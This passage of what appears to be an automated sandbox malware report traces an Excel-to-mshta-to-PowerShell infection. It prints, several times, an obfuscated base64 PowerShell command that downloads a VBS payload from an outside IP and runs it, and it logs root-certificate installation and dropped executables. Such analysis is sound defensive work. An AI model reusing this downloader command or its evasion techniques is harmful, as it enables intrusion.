vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"			Jump to behavior

Compiles C# or VB.Net code

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C022D push eax; iretd	7_2_000007FE899C0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_000007FE899C00BD pushad ; iretd	7_2_000007FE899C00C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6500BD pushad ; iretd	12_2_000007FE8B6500C1
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Code function: 12_2_000007FE8B6500CD pushad ; iretd	12_2_000007FE8B6500C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00407041 push cs; iretd	13_2_00407042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041705E push edi; iretd	13_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004030F0 push eax; ret	13_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041C8FC push cs; iretd	13_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401949 push 63DCA26Ah; ret	13_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040214B push edx; retf	13_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00402101 push ebp; iretd	13_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0040210E push eax; retf	13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004021A4 push eax; retf	13_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041125B pushfd ; ret	13_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004242D9 push esp; ret	13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_004242E3 push esp; ret	13_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401AB8 push edx; retf	13_2_00401AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00413416 push ecx; iretd	13_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_0041ECDC push ds; iretd	13_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401DF5 push ebp; iretd	13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401DA6 push ebp; iretd	13_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00416EAA push esp; retf	13_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401F0D push eax; retf	13_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FEB push edx; retf	13_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00410FEE push ebp; iretd	13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00410FF3 push ebp; iretd	13_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FA4 push edx; ret	13_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00401FBA push 0000006Ah; iretd	13_2_00401FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 13_2_00A6DFA1 push ecx; ret	13_2_00A6DFB4

Source: temp_exec.exe.11.dr

Static PE information: section name: .text entropy: 7.96543242796983

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob

Jump to behavior

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\temp_exec.exe			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
